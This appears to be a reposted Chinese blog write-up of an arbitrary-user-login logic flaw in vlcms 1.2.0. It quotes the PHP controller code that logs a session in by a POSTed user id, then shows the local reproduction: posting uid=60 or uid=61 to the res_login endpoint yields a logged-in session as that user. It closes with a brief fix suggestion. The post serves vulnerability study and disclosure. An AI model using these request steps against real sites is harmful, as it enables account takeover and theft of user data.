逻辑漏洞之任意用户登陆漏洞
环境
环境: Web: phpstudy 5.4.45
System: Windows 10x64
源码版本为:vlcms_1.2.0
什么是任意用户登录漏洞
几乎每个网站都有自己的会员系统,有会员,就有登录机制,如果可以登录其他用户账户,那么就可以窃取其他用户的资料数据。如果配合上脚本的话,甚至可以批量获取用户的数据。对网站来说,任意用户登录是一个很高危的漏洞。
环境搭建
image.png
创建数据库
image.png
查看网站是否可以正常访问
image.png
漏洞的利用
1、案例分析
vlcms/Application/Media/Controller/MemberController.class.php
post获取uid传进autoLogin()中
public function res_login(){parent::autoLogin($_POST['uid']);echo $this->ajaxReturn(array("status"=>0,"uid"=>$_POST['uid']));}
将id传进entity()。
protected function autoLogin($uid){$user =$this->entity($uid);/* 记录登录SESSION和COOKIES */$auth = array('mid' => $user['id'],'account' => $user['account'],'nickname' => $user['nickname'],'balance' => $user['balance'],'last_login_time' => $user['login_time'],);session('member_auth', $auth);session('member_auth_sign', data_auth_sign($auth));}
entity中直接根据id查询账户了。。所以只需一个id就能登录任意用户
protected function entity($id){$data = M('User','tab_')->find($id);if(empty($data)){return false;}return $data;}
案例的利用
1、先注册几个账号
image.png
2、访问url:
http://127.0.0.1/vlcms_1.2.0//index.php?s=/member/res_login/
post:uid=60
访问后,返回一串代码
image.png
接着访问http://127.0.0.1/vlcms_1.2.0//index.php?s=/member/,可以看到,已经成功登录账户
image.png
访问post:uid=61
image.png
接着访问
http://127.0.0.1/vlcms_1.2.0//index.php?s=/member/,可以看到已经成功登陆账号了,登陆uid为61的账号
image.png
查看数据库里面uid61的账号为:
image.png
修复建议
不要用id来判断账户身份
作者:二潘
链接:https://www.jianshu.com/p/ed3695059897
来源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
逻辑漏洞之任意用户登陆漏洞相关推荐
- 某信服EDR任意用户登陆漏洞分析
目录 0x01 漏洞复现 0x02 FOFA检索关键词 0x03 代码审计 影响范围: EDR <= v3.2.19 漏洞描述: 终端检测响应平台EDR,围绕终端资产安全生命周期 ...
- 通达OA V11.3 代码审计 (文件上传、文件包含、任意用户登录漏洞)
因为这段时间比较忙,抽出时间写博客很不容易,所以就简单的吧印象笔记里面的内容站上俩,没有写太多具体的分析过程,尽量都在截图中说明了 附件 通达OA11.3源码(未解码,可以自己去下SeayDzend解 ...
- 浪潮ClusterEngineV4.0 任意用户登录漏洞
文章目录 漏洞名称 漏洞描述 影响版本 fofa 漏洞复现 第一步 登录页面 第二步 成功登录后台 摘抄 漏洞名称 浪潮ClusterEngineV4.0 存在任意用户登录漏洞, 漏洞描述 浪潮Clu ...
- 通达OA任意用户登录漏洞复现
目录 通达OA任意用户登录漏洞 漏洞描述 影响范围 漏洞复现 通达OA任意用户登录漏洞
- 【漏洞复现】通达OA v11.7 在线任意用户登录漏洞
0x00 前言 通达OA V11.7版本存在这任意用户登录漏洞,该漏洞需要管理员在线才可以登录系统,另外一个方面就是编译在线的uid值进行判断. 具体fofa语法放在下面: app="TDX ...
- 安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞
安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞 一.漏洞描述 二.漏洞影响 三.网络测绘 四.漏洞复现 总结: 五.修复建议 一.漏洞描述 安恒 明御WEB应用防火墙 report ...
- 通达OA前台任意用户登录漏洞+RCE漏洞复现
声明 本文仅用于技术交流,请勿用于非法用途 由于传播.利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任. 文章作者拥有对此文章的修改和解释权.如 ...
- 通达OA 任意用户登录漏洞复现
0x00 漏洞描述 该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录. 0x01 影响版本 通达OA < 11.5.200417 版本 通达OA 201 ...
- 齐治堡垒机任意用户登录漏洞
声明:仅供漏洞检测和学习,勿用于非法测试 漏洞信息 浙江齐治科技股份有限公司是一家主要经营计算机软硬件.网络产品的技术开发等项目的公司,近日,HW期间情报齐治运维堡垒机服务端存在任意用户登录系统漏洞, ...
最新文章
- L1-016 查验身份证(2016年天梯赛模拟赛第8题)
- wordpress 常用函数-wpdb类
- TCP、UDP绑定同一端口通信的解释
- centos6.9下php7安装zip扩展
- smoothl1函数_Faster RCNN的损失函数(Loss Function)
- this.controls指所有控件吗?_Excel 控件【窗体控件】和【ActiveX控件】使用基础教程...
- linux中级之keepalived概念
- Eigen教程(5)
- Map集合之LinkedHashmap
- 3D Max 2016安装教程
- pyecharts中文手册
- 矩阵特征值和特征向量matlab,MATLAB计算矩阵特征值和特征向量
- python乒乓球比赛规则_使用Python进行体育竞技分析(预测球队成绩)
- 树莓派查看cpu温度的命令
- 《德鲁克管理思想精要》读书笔记4 - 企业诊断工具与目标管理
- 不装了,我开源了5款人脸生成器!超模脸、网红脸、萌娃脸...
- RTSP安防网络摄像头/海康大华硬盘录像机网页无插件直播之EasyNVR流媒体服务器系列产品直播延时问题解析
- 使用模拟工具Modbus Slave和PLC通讯
- DIP,QFP,PFP,PGA,BGA封装介绍
- MOSFET 和 IGBT 栅极驱动器电路的基本原理学习笔记(二)栅极驱动参考
热门文章
- c++堆栈溢出怎么解决_c语言进阶:堆栈原理揭秘
- SpringMVC之组合注解@GetMapping
- spark任务jvm内存溢出
- 【四重优化,速看】剑指 Offer 13. 机器人的运动范围
- 【已解决】width与max-width理解
- (解题报告)L1-032 Left-pad (20分)——15行代码AC
- linux 进程通信比较,浅析Linux进程通信的几种方式及其比较
- MySQL——高阶语句(上)
- dataframe两个表合并_R语言读取多个excel文件后合并:rbind/merge/cmd合并
- C语言程序设计 C语言中的时间函数